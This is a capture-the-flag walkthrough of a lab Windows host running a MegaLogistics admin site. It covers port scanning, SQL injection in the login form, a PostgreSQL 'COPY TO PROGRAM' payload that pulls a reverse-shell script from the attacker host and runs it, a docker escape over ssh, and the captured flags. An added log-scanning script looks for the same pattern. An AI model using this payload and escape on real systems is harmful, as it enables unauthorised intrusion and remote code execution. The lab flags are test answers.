Information Gathering
| IP Address | Open Ports |
|---|---|
| 10.10.10.236 | TCP: 21, 22, 135, 139, 443, 445, 5985, 47001, 49664, 49665, 49666, 49667, 49668, 49669 |
```bash
# Host discovery, then a full TCP/UDP sweep with masscan, then a service/script scan of what was found.
ip='10.10.10.236'; itf='tun0'
# No -Pn on the discovery step: with -Pn the ping scan reports "Host is up" unconditionally.
if nmap -sn "$ip" | grep -q "Host is up"; then
  echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"
  ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" \
    | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -nu | tr '\n' ',' | sed 's/,$//')
  if [ -n "$ports" ]; then
    echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"
    nmap -Pn -sV -sC -p "$ports" "$ip"
  else
    echo -e "\e[31m[!] No open ports found on $ip.\e[0m"
  fi
else
  echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"
fi
```
```
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd
| ftp-syst:
|_  SYST: UNIX emulated by FileZilla
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x 1 ftp ftp      242520560 Feb 18  2020 docker-toolbox.exe
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 5b1aa18199eaf79602192e6e97045a3f (RSA)
|   256 a24b5ac70ff399a13aca7d542876b2dd (ECDSA)
|_  256 ea08966023e2f44f8d05b31841352339 (ED25519)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      Apache httpd 2.4.38 ((Debian))
| tls-alpn:
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.38 (Debian)
| ssl-cert: Subject: commonName=admin.megalogistic.com/organizationName=MegaLogistic Ltd/stateOrProvinceName=Some-State/countryName=GR
| Not valid before: 2020-02-18T17:45:56
|_Not valid after:  2021-02-17T17:45:56
|_http-title: MegaLogistics
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```
PostgreSQL Injection RCE
```bash
# echo '10.10.10.236 megalogistic.com admin.megalogistic.com' >> /etc/hosts
```
https://megalogistic.com/
https://admin.megalogistic.com/
Submitting a single quote in the username field of the admin login form:

```http
POST / HTTP/1.1
Host: admin.megalogistic.com
Cookie: PHPSESSID=4b2a7fb20b42bc87c66dac68719ea178
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://admin.megalogistic.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Origin: https://admin.megalogistic.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

username=admin'&password=1
```

Confirming the injection point with sqlmap:

```bash
$ python3 /opt/sqlmap/sqlmap.py -u http://admin.megalogistic.com --batch --force-ssl --dbms=PostgreSQL -X POST --data 'username=admin&password=11111'
```

Stacked query using `COPY ... TO PROGRAM` for command execution:

```http
POST / HTTP/1.1
Host: admin.megalogistic.com
Cookie: PHPSESSID=4b2a7fb20b42bc87c66dac68719ea178
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://admin.megalogistic.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
Origin: https://admin.megalogistic.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

username=';COPY+(SELECT+'test')+TO+PROGRAM+'curl+10.10.16.33/reverse.sh|bash';--+-&password=1
```
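The injection above only turns into code execution because `COPY ... TO PROGRAM` runs a shell command as the OS account PostgreSQL runs under, and only a superuser or a member of `pg_execute_server_program` may issue it, so the privilege of the web application's database role is what decides the blast radius. As an added defender-side example that is not part of this writeup, the following Python scans a PostgreSQL statement log for that pattern; the log lines, the role name `webapp` and the database name are constructed assumptions.

```python
import re
from typing import List, Tuple

# Constructed sample of a PostgreSQL server log with log_statement = 'all' and
# log_line_prefix = '%m [%p] %u@%d '. The role "webapp" and the database name
# are assumptions; the injected statement is the one sent in the request above.
SAMPLE_LOG = """\
2020-02-18 17:50:01.123 UTC [4312] webapp@megalogistic LOG:  statement: SELECT * FROM users WHERE username = 'admin' AND password = '11111'
2020-02-18 17:50:02.456 UTC [4312] webapp@megalogistic ERROR:  unterminated quoted string at or near "'"
2020-02-18 17:50:09.789 UTC [4313] webapp@megalogistic LOG:  statement: SELECT * FROM users WHERE username = '';COPY (SELECT 'test') TO PROGRAM 'curl 10.10.16.33/reverse.sh|bash';-- -' AND password = '1'
2020-02-18 17:51:00.000 UTC [4400] postgres@megalogistic LOG:  statement: COPY users TO '/var/lib/postgresql/users.csv'
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<role>\w+)@(?P<db>\w+) "
    r"(?P<level>\w+):\s+(?P<msg>.*)$"
)
# COPY ... TO/FROM PROGRAM hands a command line to the shell on the database server.
PROGRAM_RE = re.compile(r"\bCOPY\b.*\b(TO|FROM)\s+PROGRAM\b", re.IGNORECASE)
# A second statement after ';' is something a parameterised login query never produces.
STACKED_RE = re.compile(r";\s*(SELECT|INSERT|UPDATE|DELETE|COPY|CREATE|DROP|ALTER)\b", re.IGNORECASE)


def scan_postgres_log(text: str, app_roles=("webapp",)) -> List[Tuple[str, str, str]]:
    """Return (pid, rule, detail) findings for log lines that look like SQL
    injection against the web application role escalating to OS command execution."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        role, level, msg = m["role"], m["level"], m["msg"]
        stmt = msg.split("statement:", 1)[1].strip() if msg.startswith("statement:") else ""
        if PROGRAM_RE.search(stmt):
            findings.append((m["pid"], "copy_program", stmt))
        elif stmt and role in app_roles and STACKED_RE.search(stmt):
            findings.append((m["pid"], "stacked_query", stmt))
        if level == "ERROR" and role in app_roles and "unterminated quoted string" in msg:
            findings.append((m["pid"], "quote_error", msg))  # stray quote from user input
    return findings


if __name__ == "__main__":
    for pid, rule, detail in scan_postgres_log(SAMPLE_LOG):
        print(f"[{rule}] pid={pid}: {detail}")
```

The plain `COPY ... TO '/path'` by the `postgres` role in the sample is deliberately not flagged: it writes a file rather than running a program, and it does not come from the application's role.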
User.txt
f0183e44378ea9774433e2ca6ac78c6a
Privilege Escalation: Docker Escape (boot2docker)
```bash
$ uname -a
$ SHELL=/bin/bash script -q /dev/null          # upgrade the shell to a proper PTY
postgres@bc56e3cc55e9:/tmp$ ssh docker@172.17.0.1   # 172.17.0.1 is the docker0 bridge, i.e. the boot2docker host VM
docker@box:~$ cat /c/Users/Administrator/Desktop/root.txt   # the Windows drive is mounted into the VM under /c
```
Root.txt
cc9a0b76ac17f8f475250738b96261b3